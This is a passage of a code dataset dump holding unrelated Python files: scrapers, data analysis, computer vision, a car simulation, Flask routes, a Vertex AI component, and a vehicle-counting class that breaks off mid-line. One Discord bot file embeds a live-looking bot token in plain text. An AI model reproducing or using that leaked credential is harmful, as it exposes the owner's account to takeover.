json.dumps(item,ensure_ascii=False)\n f.write(b+'\\n')\n print(datetime.now())\n\n\n# ceshi = DataFrame({\"title\":[],\"link\": [],\"category\": [],\"num\": [],\"city\":[],\n# \"time\": [],\"jobduties\": [],\"jobrequirement\":[]})\n# print(datetime.now())\n# for item in find(baseurl,offset):\n# frame = DataFrame.from_dict(item,orient='index').T\n# #ceshi = pd.concat([ceshi,frame],ignore_index=True)\n# ceshi = ceshi.append(frame,ignore_index=True)\n# ceshi.to_csv('job.csv')\n# print(datetime.now())\n","sub_path":"tencentjob.py","file_name":"tencentjob.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"108639213","text":"import pymorphy2\nmorph = pymorphy2.MorphAnalyzer()\n\nrequest = ''\nword = ''\narr = []\nwhile word != 'done':\n request = input().split()\n with open(\"url's.txt\", 'a') as online:\n for word in request:\n if word != 'done':\n arr += [word]\n online.write('\\n' + 'https://ru.wikipedia.org/wiki/' + word)\n\n\nindex = dict()\ns = ''\nkey = ''\nvalue = ''\nlabel = 1\nwith open('index.txt', 'r', encoding='utf8') as ind:\n for line in ind:\n s += str(line)\n\n\ni = 0\nl_1 = 1\nwhile i != len(s):\n l_1 = 1\n if i >= len(s) - 3:\n break\n key = ''\n while s[i] != \"'\":\n i += 1\n if s[i] == \"'\" and s[i + 1] == \"'\":\n while 1:\n i += 1\n if s[i] == \"[\":\n i += 1\n if s[i] == \"]\":\n i += 3\n break \n while 1:\n i += 1\n if s[i] == \"'\":\n break\n key += s[i]\n index.update({key : []})\n\n while s[i] != \"[\":\n i += 1\n while s[i] != \"'\":\n i += 1\n\n while 1:\n value = ''\n while 1:\n i += 1\n if s[i] == \"'\":\n if s[i + 1] == \"]\":\n i += 1\n index[key] += [value]\n l_1 = 0\n break\n elif s[i + 1] == \",\":\n i += 3\n index[key] += [value]\n break\n elif s[i + 1] == \"}\":\n l_1 = 0\n break\n value += s[i]\n if l_1 == 0:\n break\n\n\nset_1 = set()\nset_2 = set()\nfor i in index.values():\n for j in i:\n set_1.update({j})\n\nfor word in arr:\n p = morph.parse(word.lower())[0].normal_form\n if p in index.keys():\n #print(word, index[p])\n for i in index[p]:\n set_2.update({i})\n set_1 = set_1.intersection(set_2)\n #else:\n #print('None')\n\nprint('Your phrase is in these files:\\n', set_1)\n","sub_path":"customer's_req_0_1.py","file_name":"customer's_req_0_1.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"516877174","text":"import discord\nfrom discord.ext import commands\n\ntoken = \"NTMzNjY2OTA3NzMyMTgxMDIy.DxuXjg.KGMCrBelTXKUCygFw1TNFblBJV8\"\n\nclient = commands.Bot(command_prefix = '.', activity=discord.Game(name=\"ANNENLE\"))\n\n@client.event\nasync def on_ready():\n print(\"All Running\")\n\n@client.event\nasync def on_message(message):\n if message.content.startswith(\".\"):\n await client.process_commands(message)\n else:\n author = str(message.author)\n if (message.author != client.user):\n if (\"seco\" in author):\n await client.send_message(message.channel, \"Boş yapma dolgu yap!\")\n\n@client.command(pass_context=True)\nasync def clear(ctx, amount=5):\n channel = ctx.message.channel\n messages = []\n async for message in client.logs_from(channel, limit=int(amount)+2):\n messages.append(message)\n await client.delete_messages(messages)\n await client.say(\"Messages Deleted\")\n\n\nclient.run(token)\n","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"501136655","text":"try:\n\tn = int(input(\"Enter Number \"))\nexcept ValueError as e:\n\texit(0)\t\nif(n <= 0):\n\texit(0)\n\nfor i in range(1,n*n+1,n):\n\tprint(i, end = ' ')\n\t\nprint()\n\n","sub_path":"Day 16/16-DailyFlash_Solutions/31_Jan_Solutions_Two/Python/progam1.py","file_name":"progam1.py","file_ext":"py","file_size_in_byte":153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"330871986","text":"\"\"\"\"\n作者:boy-tech\n功能:空气质量检测(AQI),网络爬虫所有城市实时数据并保存到本地(csv),利用pandas分析数据,清洗数据,数据可视化\n版本:10.0\n日期:2019/12/28\n\"\"\"\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nplt.rcParams['font.sans-serif'] = ['SimHei']\nplt.rcParams['axes.unicode_minus'] = False\n\n\ndef main():\n \"\"\"\n 主函数\n \"\"\"\n aqi_date = pd.read_csv('china_city_aqi.csv')\n print('基本信息:')\n print(aqi_date.info())\n\n print('数据预览:')\n\n print(aqi_date.head())\n\n # 数据清洗\n # 只保留AQI>0的数据\n # filter_condition = aqi_date['AQI'] > 0\n # clean_aqi_date = aqi_date[filter_condition]\n\n clean_aqi_date = aqi_date[aqi_date['AQI'] > 0]\n\n # 基本统计\n\n print('AQI最大值:', clean_aqi_date['AQI'].max())\n print('AQI最小值:', clean_aqi_date['AQI'].min())\n print('AQI均值:', clean_aqi_date['AQI'].mean())\n\n # top50空气质量城市\n top50_cities = clean_aqi_date.sort_values(by=['AQI']).head(50)\n # print('空气质量最好的10个城市')\n # print(top50_cities)\n\n # 数据可视化\n top50_cities.plot(kind='bar', x='City', y='AQI', title='空气质量最好的50个城市',\n figsize=(20, 10))\n plt.savefig('top50_bar_aqi.png')\n plt.show()\n\n # bottom10 最差的10个城市\n # bottom10_cities = aqi_date.sort_values(by=['AQI']).tail(10)\n # 降序排列\n # bottom10_cities = clean_aqi_date.sort_values(by=['AQI'], ascending=False).head(10)\n # print('空气质量最差的10个城市')\n # print(bottom10_cities)\n\n # 数据保存成CSV\n # top10_cities.to_csv('top10_aqi.csv', index=False)\n # bottom10_cities.to_csv('bottom10_aqi.csv', index=False)\n\n\nif __name__ == '__main__':\n main()","sub_path":"air_quality_check_v10.py","file_name":"air_quality_check_v10.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"301949394","text":"import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\n\nimg1 = cv2.imread('c1.png',0)\nimg2 = cv2.imread('bicho.jpg',0)\n\n# Initiate STAR detector\n# int nfeatures=500, float scaleFactor=1.2f, int nlevels=8, int edgeThreshold=31, int firstLevel=0, int WTA_K=2, int scoreType=ORB::HARRIS_SCORE, int patchSize=31, int fastThreshold=20\norb = cv2.ORB_create(nfeatures=500, edgeThreshold=50, patchSize=50)\n\n# find the keypoints and descriptors with SIFT\nkp1, des1 = orb.detectAndCompute(img1,None)\nkp2, des2 = orb.detectAndCompute(img2,None)\n# create BFMatcher object\nbf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n\n# Match descriptors.\nmatches = bf.match(des1,des2)\n\n# Sort them in the order of their distance.\nmatches = sorted(matches, key = lambda x:x.distance)\n\nfor m in matches[:20]:\n\tprint(m.distance)\n\n# Draw first 10 matches.\nimg3 = cv2.drawMatches(img1,kp1,img2,kp2,matches[:10], None, flags=2)\n\nplt.imshow(img3),plt.show()\n\n\n\n#http://stackoverflow.com/questions/31630559/attributeerror-module-object-has-no-attribute-orb\n#http://stackoverflow.com/questions/31631352/typeerror-required-argument-outimg-pos-6-not-found/31631995#31631995\n# probar cosas del email de Nano\n# probar codigo en plugin de Image clouduki whatever\n\n\n\"\"\"\n\n# find the keypoints with ORB\nkp = orb.detect(img,None)\n\n# compute the descriptors with ORB\nkp, des = orb.compute(img, kp)\n\n# draw only keypoints location,not size and orientation\nimg2 = cv2.drawKeypoints(img,kp,None,color=(255,0,0), flags=0)\nplt.imshow(img2),plt.show()\n\"\"\"","sub_path":"python/feature_matching.py","file_name":"feature_matching.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"433931407","text":"import FWCore.ParameterSet.Config as cms\nuds = cms.EDAnalyzer(\"DataCardFileWriter\",\n\tFileName = cms.string(\"uds.dec\"),\n\tFileContent = cms.vstring()\n\t)\nuds.FileContent.extend([\n\t\"#\",\n\t\"# Force the fragmentation to produce a ddbar, uubar or ssbar pair\",\n\t\"#\",\n\t\"# Contact: Anders Ryd (ryd@hep.caltech.edu)\",\n\t\"#\",\n\t\"Decay vpho\",\n\t\"1.0 JSCONT 1;\",\n\t\"4.0 JSCONT 2;\",\n\t\"1.0 JSCONT 3;\",\n\t\"Enddecay\",\n\t\"End\"\n\t])\n","sub_path":"python/uds.py","file_name":"uds.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"448074369","text":"def get_mean_value(arr):\n return sum(arr) / len(arr)\n\ndef load(filename):\n items = []\n data = open(filename)\n for line in data.readlines():\n x, y = map(float, line.strip().split())\n items.append([x, y])\n return items\n\ndef get_partitions(items):\n result = []\n for i in range(len(items) - 1):\n cur_el = items[i][0]\n next_el = items[i + 1][0]\n result.append((cur_el + next_el) / 2)\n return result\n\n\ndef getABValues(m, items):\n left = []\n right = []\n for i in range(len(items)):\n el = items[i][0]\n if el > m:\n right.append(el)\n else:\n left.append(el)\n\n return left, right\n\ndef f(a, b, m, x):\n if x > m:\n return b\n else:\n return a \n\n\ndef get_min_index(arr):\n min_value = arr[0]\n index = 0\n for i in range(len(arr)):\n if arr[i] < min_value:\n index = i\n min_value = arr[i]\n return index\n\ndef get_result_varients(partitions):\n result_variants = []\n for m in partitions:\n left, right = getABValues(m, items)\n meanLeft = get_mean_value(left)\n meanRight = get_mean_value(right)\n result_variants.append((meanLeft, meanRight, m))\n return result_variants\n\ndef get_sse_values(result_variants, items):\n sse_values = []\n for i in range(len(result_variants)):\n a, b, m = result_variants[i]\n sse = 0\n\n for i in range(len(items)):\n el = items[i]\n q = f(a, b, m, el[0]) - el[1]\n sse += q * q\n\n sse_values.append(sse)\n return sse_values\n\ndef get_result(sse_values, result_variants):\n result_index = get_min_index(sse_values)\n best_a, best_b, best_m = result_variants[result_index]\n result = str(best_a) + ' ' + str(best_b) + ' ' + str(best_m)\n return result\n\ndef save(filename, result):\n output_file = open(filename, 'w')\n output_file.write(result)\n output_file.close()\n\nitems = load('stump.in')\nitems.sort()\npartitions = get_partitions(items)\nresult_variants = get_result_varients(partitions)\nsse_values = get_sse_values(result_variants, items)\nresult = get_result(sse_values, result_variants)\nsave('stump.out', result)","sub_path":"task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":2201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"353094432","text":"\n###create environment with car, obstacle, and the destination###\n\nimport pygame\nfrom pygame import gfxdraw\nimport math\nimport numpy\n# import fuzzy_system\nimport PSOYX1\nimport time\n#Car object with draw the car and obstacleDistance\nclass Car(object):\n def __init__(self, RBFN, x, y, degree, magnification, edge):\n self.x = x\n self.y = y\n self.xytrack = []\n #Coordinate angle\n self.degree = degree\n self.radius = 3 * magnification\n #steeringWheel moment angle\n self.steeringWheel = 0\n self.b = self.radius*2\n\n self.edge = edge\n self.detectRadius = 50 * magnification\n self.straight = 50 * magnification\n self.right = 50 * magnification\n self.left = 50 * magnification\n\n self.train4D = open(\"outputTrain4D.txt\", 'w')\n self.train6D = open(\"outputTrain6D.txt\", 'w')\n\n self.RBFN = RBFN\n\n def draw(self, gameDisplay):\n self._carMove(gameDisplay)\n\n pygame.draw.circle(gameDisplay, (255, 0, 0), (int(self.x), int(self.y)), self.radius)\n\n IntersectPointX, IntersectPointY = self._sensorDeal(self.degree)\n self.straight = self._obstacleDistance(IntersectPointX, IntersectPointY)\n pygame.draw.line(gameDisplay, (0, 255, 0), (self.x, self.y),\n (IntersectPointX, IntersectPointY))\n\n IntersectPointX, IntersectPointY = self._sensorDeal(self.degree-45)\n self.right = self._obstacleDistance(IntersectPointX, IntersectPointY)\n pygame.draw.line(gameDisplay, (0, 255, 0), (self.x, self.y),\n (IntersectPointX, IntersectPointY))\n\n IntersectPointX, IntersectPointY = self._sensorDeal(self.degree+45)\n self.left = self._obstacleDistance(IntersectPointX, IntersectPointY)\n pygame.draw.line(gameDisplay, (0, 255, 0), (self.x, self.y),\n (IntersectPointX, IntersectPointY))\n\n def getCar_X_Y(self):\n return self.x, self.y\n\n def _sensorDeal(self, degree):\n pointx, pointy = self._setInitialLinePosition(degree)\n IntersectPointX, IntersectPointY = self._findIntersectPoint(pointx, pointy)\n return IntersectPointX, IntersectPointY\n\n def _obstacleDistance(self, IntersectPointX, IntersectPointY):\n distance = math.hypot(int(self.x) - IntersectPointX, int(self.y) - IntersectPointY)\n return distance\n\n def _setInitialLinePosition(self, degree):\n pointx = int(self.x) + self.detectRadius * math.cos(math.radians(degree))\n pointy = int(self.y) - self.detectRadius * math.sin(math.radians(degree))\n return pointx, pointy\n\n def _findIntersectPoint(self, pointx, pointy):\n IntersectPointX, IntersectPointY = 0, 0\n minDistance = self.detectRadius\n Line1p1 = (int(self.x), int(self.y))\n Line1p2 = (int(pointx), int(pointy))\n for i in range(len(self.edge)-1):\n Line2p1 = (self.edge[i, 0], self.edge[i, 1])\n Line2p2 = (self.edge[i+1, 0], self.edge[i+1, 1])\n IntersectPoint = PSOYX1.calculateIntersectPoint(Line1p1, Line1p2, Line2p1, Line2p2)\n if IntersectPoint != None:\n distance = self._obstacleDistance(IntersectPoint[0], IntersectPoint[1])\n if distance < minDistance:\n minDistance = distance\n IntersectPointX, IntersectPointY = IntersectPoint[0], IntersectPoint[1]\n\n return IntersectPointX, IntersectPointY\n\n def _carMove(self, gameDisplay):\n if self.straight >= 100:\n self.straight = 0\n if self.right >= 100:\n self.right = 0\n if self.left >= 100:\n self.left = 0\n\n self.outputTxtFile()\n #set steeringWheel by RBFN\n steeringWheel = self.RBFN.get_steeringWheel(self.straight, self.right, self.left)\n self._setSteeringWheelAngle(steeringWheel)\n\n time.sleep(0.01)\n self.x = self.x + math.cos(math.radians(self.degree + self.steeringWheel)) +\\\n math.sin(math.radians(self.degree)) * math.sin(math.radians(self.steeringWheel))\n self.y = self.y - (math.sin(math.radians(self.degree + self.steeringWheel)) + \\\n math.sin(math.radians(self.steeringWheel)) * math.cos(math.radians(self.degree)))\n\n self.degree = self.degree - math.degrees(math.asinh(2*math.sin(math.radians(self.steeringWheel))/self.b))\n\n self.xytrack.append([int(self.x), int(self.y)])\n for i in self.xytrack:\n gfxdraw.pixel(gameDisplay, i[0], i[1], (255, 0, 0))\n\n def _setSteeringWheelAngle(self, steeringWheel):\n if steeringWheel > 40:\n steeringWheel = 40\n elif steeringWheel < -40:\n steeringWheel = -40\n self.steeringWheel = steeringWheel\n\n def outputTxtFile(self):\n self.train4D.write(' '.join((str(self.straight/2), str(self.right/2), str(self.left/2), str(self.steeringWheel), \"\\n\")))\n self.train6D.write(' '.join((str((self.x-400)/2), str((-(self.y-300))/2), str(self.straight/2), str(self.right/2), str(self.left/2), str(self.steeringWheel), \"\\n\")))\n\n#The end of the car have to arrive\nclass Destination(object):\n def __init__(self, positionx, positiony, rangex, rangey):\n self.positionx = positionx\n self.positiony = positiony\n self.rangex = rangex\n self.rangey = rangey\n def draw(self, gameDisplay):\n #self.positionx, self.positiony are the coordinates of the upper left hand corner\n pygame.draw.rect(gameDisplay, (0, 0, 0), [self.positionx, self.positiony, self.rangex, self.rangey])\n def detectCarCollision(self, CarX, CarY):\n if (self.positionx < CarX and CarX < self.positionx+self.rangex)\\\n and (self.positiony > CarY and CarY > self.positiony+self.rangey):\n return True\n return False\n\n#Draw the wall\nclass Edge(object):\n def __init__(self, edge):\n self.edge = edge\n\n def draw(self, gameDisplay):\n for i in range(len(self.edge)-1):\n pygame.draw.line(gameDisplay, (0, 0, 255), (self.edge[i,0], self.edge[i,1]), (self.edge[i+1,0], self.edge[i+1,1]))\n\n\n","sub_path":"PSOYX4.py","file_name":"PSOYX4.py","file_ext":"py","file_size_in_byte":6140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"375646325","text":"from flask import Blueprint, Response, request, jsonify\nfrom flask_login import login_required\n\nfrom db import db\nfrom models.Host import Host\nfrom utils.request_utils import Serializer\n\nhost = Blueprint('host', __name__)\n\n\n# admin route for getting all hosts\n@host.route('/', methods=['GET'])\n@login_required\ndef index():\n _hosts = Host.query.all()\n return jsonify(Serializer.serialize_list(_hosts))\n\n\n# admin route for getting a single host\n@host.route('/host', methods=['GET'])\n@login_required\ndef show():\n return Host.by_id(request.args.get('host_id')).serialize()\n\n\n# public facing signup route (no login required) - allows a host to enter\n# their info but cannot set w9 status\n@host.route('/signup', methods=['POST'])\ndef signup_host():\n new_host = Host.make_new(request.json)\n db.session.add(new_host)\n db.session.commit()\n return Response('submit success', status=201, mimetype='application/json')\n\n\n# admin route for adding a host - can set w9 bool\n@host.route('/add', methods=['POST'])\n@login_required\ndef add_host():\n data = request.json\n new_host = Host.make_new(data)\n\n if 'w9_received' in data:\n new_host.w9_received = data['w9_received']\n\n db.session.add(new_host)\n db.session.commit()\n return Response('Host {} {} created'.format(new_host.first_name, new_host.last_name),\n status=201, mimetype='application/json')\n\n\n# admin route for updating a host\n@host.route('/update', methods=['POST'])\n@login_required\ndef update_host():\n Host.update(request.json)\n return Response('host updated', status=200, mimetype='application/json')\n","sub_path":"controllers/host.py","file_name":"host.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"251684810","text":"from typing import NamedTuple\n\nfrom kfp.components import create_component_from_func, InputPath, OutputPath\n\n\ndef upload_Scikit_learn_pickle_model_to_Google_Cloud_Vertex_AI(\n model_path: InputPath(\"ScikitLearnPickleModel\"),\n sklearn_version: str = None,\n\n display_name: str = None,\n description: str = None,\n\n # Uncomment when anyone requests these:\n # instance_schema_uri: str = None,\n # parameters_schema_uri: str = None,\n # prediction_schema_uri: str = None,\n # explanation_metadata: \"google.cloud.aiplatform_v1.types.explanation_metadata.ExplanationMetadata\" = None,\n # explanation_parameters: \"google.cloud.aiplatform_v1.types.explanation.ExplanationParameters\" = None,\n\n project: str = None,\n location: str = \"us-central1\",\n labels: dict = None,\n # encryption_spec_key_name: str = None,\n staging_bucket: str = None,\n) -> NamedTuple(\"Outputs\", [\n (\"model_name\", \"GoogleCloudVertexAiModelName\"),\n (\"model_dict\", dict),\n]):\n import datetime\n import json\n import os\n import shutil\n import tempfile\n from google.cloud import aiplatform\n\n if not location:\n location = os.environ.get(\"CLOUD_ML_REGION\")\n\n if not labels:\n labels = {}\n labels[\"component-source\"] = \"github-com-ark-kun-pipeline-components\"\n\n # The serving container decides the model type based on the model file extension.\n # So we need to rename the mode file (e.g. /tmp/inputs/model/data) to *.pkl\n _, renamed_model_path = tempfile.mkstemp(suffix=\".pkl\")\n shutil.copyfile(src=model_path, dst=renamed_model_path)\n\n display_name = display_name or \"Scikit-learn model \" + datetime.datetime.now().isoformat(sep=\" \")\n\n model = aiplatform.Model.upload_scikit_learn_model_file(\n model_file_path=renamed_model_path,\n sklearn_version=sklearn_version,\n\n display_name=display_name,\n description=description,\n\n # instance_schema_uri=instance_schema_uri,\n # parameters_schema_uri=parameters_schema_uri,\n # prediction_schema_uri=prediction_schema_uri,\n # explanation_metadata=explanation_metadata,\n # explanation_parameters=explanation_parameters,\n\n project=project,\n location=location,\n labels=labels,\n # encryption_spec_key_name=encryption_spec_key_name,\n staging_bucket=staging_bucket,\n )\n model_json = json.dumps(model.to_dict(), indent=2)\n print(model_json)\n return (model.resource_name, model_json)\n\nif __name__ == \"__main__\":\n # Getting input descriptions\n # try:\n # from google.cloud import aiplatform\n # upload_Scikit_learn_model_to_Google_Cloud_Vertex_AI.__doc__ = aiplatform.Model.upload_scikit_learn_model_file.__doc__\n # except ImportError:\n # pass\n\n upload_Scikit_learn_pickle_model_to_Google_Cloud_Vertex_AI_op = create_component_from_func(\n func=upload_Scikit_learn_pickle_model_to_Google_Cloud_Vertex_AI,\n base_image=\"python:3.9\",\n packages_to_install=[\n # \"google-cloud-aiplatform==1.10.0\",\n \"git+https://github.com/Ark-kun/python-aiplatform@9b50f62b9d1409644656fb3202edc7be19c722f4#egg=google-cloud-aiplatform&subdirectory=.\" # branch: fix--Fixed-getitng-project-ID-when-running-on-Vertex-AI\n ],\n annotations={\n \"author\": \"Alexey Volkov \",\n \"canonical_location\": \"https://raw.githubusercontent.com/Ark-kun/pipeline_components/master/components/google-cloud/Vertex_AI/Models/Upload_Scikit-learn_pickle_model/component.yaml\",\n },\n output_component_file=\"component.yaml\",\n )\n","sub_path":"components/google-cloud/Vertex_AI/Models/Upload_Scikit-learn_pickle_model/component.py","file_name":"component.py","file_ext":"py","file_size_in_byte":3621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"158779520","text":"import math\nimport numpy as np\n\ncolors = [(18, 0, 230),\n (0, 152, 243),\n (31, 195, 143),\n (68, 153, 0),\n (150, 158, 0),\n (233, 160, 0),\n (183, 104, 0),\n (136, 32, 29),\n (131, 7, 146),\n (128, 0, 228),\n (79, 0, 229)]\n\n\nclass Counter(object):\n def __init__(self, video_size, class_names, resize_ratio):\n print('video_size:', video_size)\n self.class_names = class_names\n self.resize_ratio = resize_ratio\n self.width, self.height = video_size\n self.used_label_idxs = []\n self.overlap_dicts = []\n self.use_labels = ['car', 'bus', 'truck']\n self.entry_from_left_range = [round(self.width * 0.25), round(self.width * 0.4)]\n self.entry_from_right_range = [round(self.width * 0.6), round(self.width * 0.75)]\n self.exit_to_left_range = [0, round(self.width * 0.25)]\n self.exit_to_right_range = [round(self.width * 0.75), self.width]\n self.entry_from_left_count = 0\n self.entry_from_right_count = 0\n self.exit_to_left_count = 0\n self.exit_to_right_count = 0\n\n self.pre_detected_obj_dicts = {}\n\n def _get_class(self):\n classes_path = os.path.expanduser(self.classes_path)\n with open(classes_path) as f:\n class_names = f.readlines()\n class_names = [c.strip() for c in class_names]\n return class_names\n\n def process_on_frame(self, image, out_boxes, out_scores, out_classes):\n detected_obj_dicts = {}\n use_label_idxs = []\n\n label_idx = 0\n\n out_boxes_2 = []\n out_label_idxs = []\n out_scores_2 = []\n out_classes_2 = []\n out_colors_2 = []\n\n closenesses = [] # 検出した車体間の座標の近さ\n #for idx, x in enumerate(output):\n for idx, c in enumerate(out_classes):\n i = idx\n predicted_class = self.class_names[c]\n label = predicted_class\n box = out_boxes[i]\n score = out_scores[i]\n\n top, left, bottom, right = box\n # top = max(0, np.floor(top + 0.5).astype('int32'))\n # left = max(0, np.floor(left + 0.5).astype('int32'))\n # bottom = min(image.size[1], np.floor(bottom + 0.5).astype('int32'))\n # right = min(image.size[0], np.floor(right + 0.5).astype('int32'))\n\n area = (right - left) * (bottom - top)\n # 小さく映っている車は排除\n if area < 8000 * self.resize_ratio ** 2:\n continue\n\n center = (int((right - left) / 2 + left), int((bottom - top) / 2 + top))\n\n # 端っこに映っている車は排除\n if center[0] < self.width * 0.05 or self.width * 0.95 < center[0]:\n continue\n\n #cls = int(x[-1])\n #label = \"{0}\".format(classes[cls])\n\n if label in self.use_labels:\n # 前のフレームに車体が無かったとき\n if len(self.pre_detected_obj_dicts) == 0:\n if idx == 0:\n self.used_label_idxs = []\n self.overlap_dicts = []\n\n color = colors[label_idx % len(colors)]\n\n # 同じ物体を複数回検出している問題を解決\n break_flag = False\n for k, v in detected_obj_dicts.items():\n c_l = abs(left - v['left'])\n c_t = abs(top - v['top'])\n c_r = abs(right - v['right'])\n c_b = abs(bottom - v['bottom'])\n close = c_l + c_t + c_r + c_b\n\n if close < 400 * self.resize_ratio ** 2:\n break_flag = True\n break\n if break_flag: continue\n\n # 車体が進入範囲にあるか調べる\n if self.entry_from_left_range[0] < center[0] < self.entry_from_left_range[1]:\n is_entried_from_left = True\n is_entried_from_right = False\n self.entry_from_left_count += 1\n elif self.entry_from_right_range[0] < center[0] < self.entry_from_right_range[1]:\n is_entried_from_left = False\n is_entried_from_right = True\n self.entry_from_right_count += 1\n else:\n is_entried_from_left = False\n is_entried_from_right = False\n\n # 車体が退出範囲にあるか調べる\n is_exited_to_left = False\n is_exited_to_right = False\n\n detected_obj_dict = {'left': left,\n 'top': top,\n 'right': right,\n 'bottom': bottom,\n 'center': center,\n 'color': color,\n 'is_first_frame_detected': True,\n 'direction': 'unknown',\n 'speed': 'unknown',\n 'is_entried_from_left': is_entried_from_left,\n 'is_entried_from_right': is_entried_from_right,\n 'is_exited_to_left': is_exited_to_left,\n 'is_exited_to_right': is_exited_to_right}\n\n # 検出した車体間の座標の近さを計算\n closes = []\n for v in detected_obj_dicts.values():\n c_l = abs(left - v['left'])\n c_t = abs(top - v['top'])\n c_r = abs(right - v['right'])\n c_b = abs(bottom - v['bottom'])\n close = c_l + c_t + c_r + c_b\n closes.append(close)\n closenesses.append(closes)\n\n use_label_idxs.append(label_idx)\n use_label_idxs.sort()\n if not label_idx in self.used_label_idxs:\n self.used_label_idxs.append(label_idx)\n self.used_label_idxs.sort()\n detected_obj_dicts[label_idx] = detected_obj_dict\n out_boxes_2.append(box)\n out_label_idxs.append(label_idx)\n out_scores_2.append(score)\n out_classes_2.append(c)\n out_colors_2.append(color)\n label_idx += 1\n # 前のフレームに車体が有ったとき\n else:\n # 前フレームで検出された物体と同一の物体か確かめる\n label_idx = None\n min_distance = None\n color = None\n\n break_flag = False\n for max_distance in (40, 80, 120, 160, 200): # なるべく一番近いものが優先されるように、ちょっとずつ調べる\n max_distance *= self.resize_ratio ** 2\n for k, v in self.pre_detected_obj_dicts.items():\n pre_center = v['center']\n pre_label_idx = k\n pre_color = v['color']\n\n # 走行していることを考慮する\n speed = v['speed']\n if speed != 'unknown':\n distance = math.sqrt((center[0] - pre_center[0] - speed) ** 2 + (center[1] - pre_center[1]) ** 2)\n else:\n distance = math.sqrt((center[0] - pre_center[0]) ** 2 + (center[1] - pre_center[1]) ** 2)\n\n if distance > max_distance: # あまりにも離れていたら止める\n continue\n elif min_distance is None or min_distance > distance:\n label_idx = pre_label_idx\n color = pre_color\n min_distance = distance\n break_flag = True\n break\n if break_flag:\n break\n\n # 前フレームに同一と思われる物体がない場合(新しい物体だと認識する)\n if min_distance is None:\n # 最後のラベル番号+1\n label_idx = self.used_label_idxs[-1] + 1\n is_first_frame_detected = True\n direction = 'unknown'\n speed = 'unknown'\n\n # 車体が進入範囲にあるか調べる\n if self.entry_from_left_range[0] < center[0] < self.entry_from_left_range[1]:\n is_entried_from_left = True\n is_entried_from_right = False\n self.entry_from_left_count += 1\n elif self.entry_from_right_range[0] < center[0] < self.entry_from_right_range[1]:\n is_entried_from_left = False\n is_entried_from_right = True\n self.entry_from_right_count += 1\n else:\n is_entried_from_left = False\n is_entried_from_right = False\n\n # 車体が退出範囲にあるか調べる\n is_exited_to_left = False\n is_exited_to_right = False\n\n # 車体が重なりから脱出したものか判定\n for idx, stack_dict in reversed(list(enumerate(self.overlap_dicts))):\n stack_label_idx1, stack_label_idx2 = stack_dict.keys()\n if stack_label_idx2 in detected_obj_dicts:\n stack_v = detected_obj_dicts[stack_label_idx2]\n left2 = stack_v['left']\n right2 = stack_v['right']\n\n if left < left2 < right < right2 or left2 < left < right2 < right:\n label_idx = stack_label_idx1\n\n d = stack_dict[label_idx]\n direction = d['direction']\n speed = d['speed']\n is_entried_from_left = d['is_entried_from_left']\n is_entried_from_right = d['is_entried_from_right']\n is_exited_to_left = d['is_exited_to_left']\n is_exited_to_right = d['is_exited_to_right']\n\n self.overlap_dicts.pop(idx)\n else:\n self.overlap_dicts.pop(idx)\n\n\n color = colors[label_idx % len(colors)]\n\n detected_obj_dict = {'left': left,\n 'top': top,\n 'right': right,\n 'bottom': bottom,\n 'center': center,\n 'color': color,\n 'is_first_frame_detected': is_first_frame_detected,\n 'direction': direction,\n 'speed': speed,\n 'is_entried_from_left': is_entried_from_left,\n 'is_entried_from_right': is_entried_from_right,\n 'is_exited_to_left': is_exited_to_left,\n 'is_exited_to_right': is_exited_to_right}\n\n # 検出した車体間の座標の近さを計算\n closes = []\n for k, v in detected_obj_dicts.items():\n c_l = abs(left - v['left'])\n c_t = abs(top - v['top'])\n c_r = abs(right - v['right'])\n c_b = abs(bottom - v['bottom'])\n close = c_l + c_t + c_r + c_b\n closes.append(close)\n closenesses.append(closes)\n\n use_label_idxs.append(label_idx)\n use_label_idxs.sort()\n if not label_idx in self.used_label_idxs:\n self.used_label_idxs.append(label_idx)\n self.used_label_idxs.sort()\n detected_obj_dicts[label_idx] = detected_obj_dict\n out_boxes_2.append(box)\n out_label_idxs.append(label_idx)\n out_scores_2.append(score)\n out_classes_2.append(c)\n out_colors_2.append(color)\n # 前フレームに同一と思われる物体がある場合\n else:\n # 同じ物体を複数回検出している問題を解決\n break_flag = False\n for k, v in detected_obj_dicts.items():\n c_l = abs(left - v['left'])\n c_t = abs(top - v['top'])\n c_r = abs(right - v['right'])\n c_b = abs(bottom - v['bottom'])\n close = c_l + c_t + c_r + c_b\n\n if close < 400 * self.resize_ratio ** 2:\n break_flag = True\n break\n if break_flag: continue\n\n for k, v in detected_obj_dicts.items():\n if label_idx == k:\n pre_center = v['center']\n break\n\n # 同フレームにすでに、そのラベル番号が振られた物体がある場合、新しい物体とする\n if label_idx in use_label_idxs:\n label_idx = self.used_label_idxs[-1] + 1\n direction = 'unknown'\n speed = 'unknown'\n\n # 車体が進入範囲にあるか調べる\n if self.entry_from_left_range[0] < center[0] < self.entry_from_left_range[1]:\n is_entried_from_left = True\n is_entried_from_right = False\n self.entry_from_left_count += 1\n elif self.entry_from_right_range[0] < 